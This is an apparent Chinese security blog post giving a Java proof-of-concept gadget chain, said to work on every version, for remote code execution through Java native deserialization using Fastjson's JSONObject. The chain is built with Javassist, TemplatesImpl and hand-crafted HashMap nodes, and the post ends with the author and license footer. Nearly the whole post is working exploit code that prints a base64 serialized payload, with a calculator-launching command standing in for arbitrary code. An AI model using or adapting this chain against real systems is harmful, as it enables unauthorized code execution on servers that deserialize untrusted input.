Fastjson原生反序列化全版本通杀

23 年 4 月 26 日 星期三
146 字
1 分钟
java
ClassPool pool = ClassPool.getDefault();
CtClass evil = pool.makeClass("evil");
evil.setSuperclass(pool.get(AbstractTranslet.class.getName()));
evil.makeClassInitializer().insertBefore("Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
byte[] bytes = evil.toBytecode();

TemplatesImpl templates = new TemplatesImpl();
Field name = templates.getClass().getDeclaredField("_name");
name.setAccessible(true);
name.set(templates, "t");
Field bytecodes = templates.getClass().getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(templates, new byte[][]{ bytes });
Field tfactory = templates.getClass().getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates, new TransformerFactoryImpl());

JSONObject jsonObject = new JSONObject();
jsonObject.put("t", templates);

XString t = new XString("t");

HashMap<Object, Object> hashMap = new HashMap<>();
HashMap<Object, Object> hashMap1 = new HashMap<>();
hashMap.put("Ma", t);
hashMap.put("NB", jsonObject);
hashMap1.put("NB", t);
hashMap1.put("Ma", jsonObject);
HashMap<Object, Object> hashMap2 = new HashMap<>();
Field size = hashMap2.getClass().getDeclaredField("size");
size.setAccessible(true);
size.set(hashMap2, 2);
Class<?> aClass = Class.forName("java.util.HashMap$Node");
Constructor<?> constructor = aClass.getDeclaredConstructor(int.class, Object.class, Object.class, aClass);
constructor.setAccessible(true);
Object o = Array.newInstance(aClass, 2);
Array.set(o, 0, constructor.newInstance(0, hashMap, "t", null));
Array.set(o, 1, constructor.newInstance(0, hashMap1, "t", null));
Field table = hashMap2.getClass().getDeclaredField("table");
table.setAccessible(true);
table.set(hashMap2, o);

HashMap<Object, Object> hashMap3 = new HashMap<>();
hashMap3.put(templates, hashMap2);

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(hashMap3);
System.out.println(Tools.base64Encode(byteArrayOutputStream.toByteArray()));

文章标题:Fastjson原生反序列化全版本通杀

文章作者:Crazy0x70

文章链接:https://www.crazy0x70.com/posts/11[复制]

最后修改时间:

商业转载请联系站长获得授权,非商业转载请注明本文出处及文章链接,您可以自由地在任何媒体以任何形式复制和分发作品,也可以修改和创作,但是分发衍生作品时必须采用相同的许可协议。
本文采用CC BY-NC-SA 4.0进行许可。